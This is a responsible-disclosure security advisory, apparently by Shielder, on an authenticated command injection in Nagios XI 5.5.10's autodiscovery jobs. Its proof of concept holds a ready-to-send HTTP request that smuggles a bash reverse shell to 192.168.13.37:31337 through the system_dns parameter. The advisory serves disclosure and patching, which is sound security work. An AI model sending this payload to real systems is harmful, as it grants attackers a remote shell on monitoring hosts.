Nagios XI 5.5.10 Autodiscovery Authenticated Remote Code Execution

Summary

Command injection in Nagios XI before 5.5.11 allows authenticated users to execute arbitrary remote commands via a new autodiscovery job.

Product description (from vendor)

“[Nagios XI] Provides monitoring of all mission-critical infrastructure components including applications, services, operating systems, network protocols, systems metrics, and network infrastructure. Hundreds of third-party addons provide for monitoring of virtually all in-house applications, services, and systems”. For more information visit https://www.nagios.com/products/nagios-xi/.

CVE(s)

Details

Root cause analysis

Autodiscovery jobs allow a user to setup a scheduled scan of a specific subnet, along with many other options. That functionality resides in nagiosxi/basedir/html/includes/components/autodiscovery/autodiscovery.inc.php, where the function called autodiscovery_component_get_cmdline handles the user-provided parameters and returns the shell commands to run:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
<?php

function autodiscovery_component_get_cmdline($jobid){
    [...]
    
--> $system_dns = grab_array_var($jarr, "system_dns", "off");
    
    [...]

    if ($system_dns == "on") {
        $system_dns = "--system-dns=1";
    }

    [...]
    
--> $cmd = "rm -f " . $xml_file . "; touch " . $watch_file . "; sudo /usr/bin/php " . $script_dir . "autodiscover_new.php --addresses=\"" . escapeshellcmd($address) . "\"  --exclude=\"" . escapeshellcmd($exclude_address) . "\" --output=" . $xml_file . " --watch=" . $watch_file . " --onlynew=0 --debug=1 " . $osd . " " . $topod . " " . $scan_delay . " " . $system_dns . " > " . $out_file . " 2>&1 & echo $!";

    return $cmd;
}

Since it is not validated nor sanitized, by providing the API endpoint a malicious system_dns HTTP POST parameter it is possible to gain arbitrary code execution on the Nagios XI host.

Proof of concept

  1. Edit the following HTTP request with the correct cookie and reverse shell parameters and send it:
1
2
3
4
5
6
7
8
POST /nagiosxi/includes/components/autodiscovery/?mode=newjob HTTP/1.1
Host: nagiosxi.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 310
Connection: close
Cookie: nagiosxi=8rspko6npt4lkfqcvo9u5i70b2

update=1&job=-1&nsp=d333dca41f296fae9327eecdce86332176ed6bfc82c352e3276751ecedd6f172&address=192.168.1&exclude_address=&frequency=Once&hour=09&minute=00&ampm=AM&dayofweek=1&dayofmonth=1&os_detection=on&scandelay=&system_dns=%3bbash+-i+>%26+/dev/tcp/192.168.13.37/31337+0>%261%3b&topology_detection=&updateButton=
  1. Notice a TCP reverse shell is spawned with Nagios XI privileges.

Impact

An authenticated attacker with autodiscovery job creation privileges can gain remote code execution on the Nagios XI host.

Remediation

Upgrade to Nagios XI 5.5.11 or later. (Note: we didn’t verify the patch.)

Disclosure timeline

This report was subject to Shielder’s disclosure policy:

  • 20/02/2019:
    • Vulnerability report is sent to vendor
    • Vendor acknowledges issue and begins triage process
  • 28/02/2019: Vendor releases Nagios XI 5.5.11
  • 10/04/2019: Shielder’s advisory is made public

Credits

`polict` of Shielder

Data

10 April 2019